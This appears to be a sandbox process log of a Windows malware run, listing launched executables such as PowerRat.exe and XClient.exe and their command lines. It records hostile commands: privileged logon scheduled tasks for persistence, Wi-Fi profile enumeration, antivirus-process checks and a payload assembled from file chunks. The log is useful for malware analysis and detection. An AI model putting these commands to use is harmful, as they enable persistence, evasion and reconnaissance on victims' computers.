"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\random.exe

"C:\Users\Admin\Desktop\Files\random.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\Files\sam.exe

"C:\Users\Admin\Desktop\Files\sam.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CbU7OfKCtes6.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\PowerRat.exe

"C:\Users\Admin\Desktop\Files\PowerRat.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\DllHost.exe

"C:\Windows\system32\DllHost.exe" /Processid:{9F156763-7844-4DC4-B2B1-901F640F5155}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iGrTS9ZFWksk.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\nobody.exe

"C:\Users\Admin\Desktop\Files\nobody.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\Desktop\Files\bnkrigkawd.exe

"C:\Users\Admin\Desktop\Files\bnkrigkawd.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\Desktop\Files\99awhy8l.exe

"C:\Users\Admin\Desktop\Files\99awhy8l.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AEnGm3FHatpx.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 578678

C:\Windows\SysWOW64\findstr.exe

findstr /V "PEACEFOLKSEXUALISLANDS" Hill

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y

C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif

Cooper.pif y

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe

"C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe"

C:\Users\Admin\Desktop\Files\XM.exe

"C:\Users\Admin\Desktop\Files\XM.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\Desktop\Files\xxx.exe

"C:\Users\Admin\Desktop\Files\xxx.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\Files\surfex.exe

"C:\Users\Admin\Desktop\Files\surfex.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZYRYbhs6JAqJ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\MicrosoftEdge_X64_133.0.3065.59_132.0.2957.140.exe" --previous-version="132.0.2957.140" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.60 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.59 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6e0966a68,0x7ff6e0966a74,0x7ff6e0966a80

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Impacts.bat

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8JmbWji5E3Yw.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XSkv0xgggIX8.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ucuDPTnOk23r.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Users\Admin\AppData\Local\Temp\temp_16571.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KHOiRSC3GgYR.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\temp_16943.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16943.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vFqv7AQ7aghj.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping …

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16933.exe"

C:\Users\Admin\AppData\Local\Temp\temp_16571.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inzBSFcKmn5c.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\temp_16571.exe

"C:\Users\Admin\AppData\Local\Temp\temp_16571.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\s4jzXqOvEGfn.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZIe5oHJX8Suu.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5mY021yCVQh1.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KFbtkHMeAXJX.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5vr1M2usLXRc.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe

"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"

C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe

"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"

C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe

"C:\Users\Admin\Desktop\Files\pimer_bbbcontents7.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nUS2gPIhGtNN.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\Desktop\Files\svchost.exe

"C:\Users\Admin\Desktop\Files\svchost.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EWxfLIywvcEI.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3D63.tmp.bat""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$77svchost" /tr '"C:\Users\Admin\AppData\Roaming\$77svchost.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\werfault.exe

werfault.exe /h /shared Global\c02a2c241a324dd19c2b6e4c88626ac7 /t 5616 /p 5944

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe

C:\Users\Admin\AppData\Local\Temp\628F.tmp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\86thw9DB5LQg.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UkTqg95ZhAml.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Users\Admin\Desktop\Files\xxx.exe

"C:\Users\Admin\Desktop\Files\xxx.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8pVhhKXcKhQS.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YcMFuuFoZHsp.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\7777.exe

"C:\Users\Admin\Desktop\Files\7777.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xPlf2BI6iEkA.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

